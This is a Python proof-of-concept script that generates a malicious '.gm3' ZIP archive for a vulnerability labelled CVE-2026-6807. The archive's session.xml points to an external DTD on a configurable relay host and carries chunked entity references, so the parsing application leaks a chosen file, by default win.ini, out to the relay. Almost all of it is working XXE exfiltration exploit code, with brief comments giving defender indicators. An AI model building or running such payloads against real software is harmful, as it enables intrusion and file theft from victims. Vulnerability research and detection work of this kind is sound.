POC / gen_payload.py PY
"""
Generates malicious.gm3 for CVE-2026-6807.
Target file path is passed to the relay via ?t= in the DTD URL.
The relay reads the file server-side and serves back chunked general entities.
"""
import zipfile, base64, argparse, urllib.parse, os

# Fallback values for any command-line option that is not supplied.
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 7778
DEFAULT_TARGET = "C:/windows/win.ini"
DEFAULT_OUTPUT = "malicious.gm3"
# Slice width, in base64 characters, used when the chunk count is computed.
MAX_CHUNK = 150

parser = argparse.ArgumentParser(description="CVE-2026-6807 payload generator")
parser.add_argument(
    "-t", "--target",
    default=DEFAULT_TARGET,
    help="File to exfiltrate on the victim",
)
parser.add_argument(
    "--host",
    default=DEFAULT_HOST,
    help="Relay listener host",
)
parser.add_argument(
    "--port",
    type=int,
    default=DEFAULT_PORT,
    help="Relay listener port",
)
parser.add_argument(
    "-o", "--output",
    default=DEFAULT_OUTPUT,
    help="Output .gm3 path",
)
# Parsing happens at import time: this file is a flat script, not a module.
args = parser.parse_args()

# session.xml needs one entity reference per chunk, so the count is fixed here.
# When a local copy of the file exists, the count is derived from the length of
# its base64 encoding split into MAX_CHUNK-character slices.
local_path = args.target.replace("/", os.sep)
try:
    with open(local_path, "rb") as f:
        raw = f.read()
except FileNotFoundError:
    # No local copy to measure: the count is typed in by hand. int() raises
    # ValueError on non-numeric input, which is left unhandled.
    n = int(input("[?] Target not found locally. How many chunks to expect? "))
else:
    encoded = base64.b64encode(raw).decode()
    chunks = [
        encoded[start:start + MAX_CHUNK]
        for start in range(0, len(encoded), MAX_CHUNK)
    ]
    n = len(chunks)
    print(f"[*] {args.target}: {len(raw)} bytes -> {n} chunks")
# safe="" percent-encodes every reserved character, "/" included, so the whole
# path travels as the single ?t= query value of the DTD URL.
encoded_path = urllib.parse.quote(args.target, safe="")
dtd_url = f"http://{args.host}:{args.port}/evil.dtd?t={encoded_path}"

# One general-entity reference (&c0; ... &c<n-1>;) per expected chunk.
entity_names = [f"&c{i};" for i in range(n)]
entity_refs = "\n  ".join(entity_names)

# The DOCTYPE names an external DTD fetched over HTTP. A parser configured to
# refuse external DTDs and external entities never makes that request.
# Observable indicators for defenders: a SYSTEM identifier with an http:// URL
# in an archive's session.xml, and an outbound DTD fetch from the application
# that parses it.
session_xml = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    f'<!DOCTYPE session SYSTEM "{dtd_url}">\n'
    "<session>\n"
    f"  {entity_refs}\n"
    "</session>\n"
)

manifest_xml = '<?xml version="1.0" encoding="UTF-8"?>\n<manifest ver="3.2"/>\n'
stub = '<?xml version="1.0" encoding="UTF-8"?>\n<stub/>\n'

# Archive members in write order. The manifest and the three stubs contain no
# DOCTYPE; session.xml is the only member that can carry one.
members = (
    ("manifest.xml", manifest_xml),
    ("session.xml", session_xml),
    ("logical.xml", stub),
    ("physical.xml", stub),
    ("mesh.xml", stub),
)

# The .gm3 output is written as a deflate-compressed ZIP container.
with zipfile.ZipFile(args.output, "w", zipfile.ZIP_DEFLATED) as zf:
    for member_name, member_body in members:
        zf.writestr(member_name, member_body)

print(f"[+] Written {args.output} ({n} entity refs -> {dtd_url})")